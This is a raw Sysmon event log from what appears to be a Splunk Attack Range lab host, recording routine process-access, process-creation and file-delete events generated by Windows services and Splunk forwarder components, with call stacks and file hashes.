08:01:25.047{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809199Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.047{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809198Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.047{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809197Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.047{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809196Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.047{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809195Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.047{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809194Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.047{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809193Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.047{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809192Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.047{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809191Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.047{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F6D5-60EB-B379-00000000D001}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809190Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.031{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F6D5-60EB-B379-00000000D001}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809189Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.032{0C1E0330-F6D5-60EB-B379-00000000D001}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000809247Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.938{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F6D6-60EB-B679-00000000D001}2360C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809246Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.938{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809245Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.938{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809244Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.938{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809243Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.938{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809242Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.938{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809241Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.938{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809240Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.938{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809239Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.938{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809238Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.922{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809237Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.922{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F6D6-60EB-B679-00000000D001}2360C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809236Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.922{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F6D6-60EB-B679-00000000D001}2360C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809235Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.923{0C1E0330-F6D6-60EB-B679-00000000D001}2360C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809234Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.906{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=923CB4F0D667D646BE12285618C91AF0,SHA256=27F06980E23D42620B5C45724E2B5662B2B2C2229C9248C8776D9E07289B9960,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809233Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.906{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0312BD675765D0952A16A74218F50F9,SHA256=FA00F44C2FEE65B0B1AD3A3136C9E626EFE0E4B73CE129D191EE50F96BCBC76B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052391Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:26.266{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 